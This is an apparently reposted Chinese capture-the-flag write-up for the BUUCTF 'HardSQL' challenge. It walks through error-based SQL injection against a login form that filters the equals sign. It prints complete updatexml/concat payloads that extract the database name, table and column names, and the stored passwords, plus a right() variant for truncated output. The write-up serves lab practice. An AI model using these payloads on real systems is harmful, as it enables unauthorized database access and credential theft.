很久没做sql了。。
打开这题,还想拿sqlmap跑,但是没跑出来,要手注了
先用万能密码登了一下
回显,是有爆东西的
然后就想到先用bp fuzz字典跑一下
就看到等号被过滤了,要用like来过滤
然后就去搜了很多用like过滤的,但是没啥思路
看了wp
1'or(updatexml(0,concat(0x5e,database()),0))#
使用报错注入,就是括号很容易少打。。
可以看到爆出了用户名
爆表了,H4rDsq1,因为这里等号被过滤了,所以要用like
1'or(updatexml(0,concat(0x5e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))),0))#
爆字段
1'or(updatexml(0,concat(0x5e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),0))#
爆值
1'or(updatexml(0,concat(0x5e,(select(group_concat(password))from(H4rDsq1))),0))#
但是发现只能看到一半,需要使用right函数
1'or(updatexml(0,concat(0x5e,right((select(group_concat(password))from(H4rDsq1)),31)),0))#
文章来源:https://www.toymoban.com/news/detail-732260.html
flag拼了半天我丢文章来源地址https://www.toymoban.com/news/detail-732260.html
到了这里,关于buuctf-[极客大挑战 2019]HardSQL的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!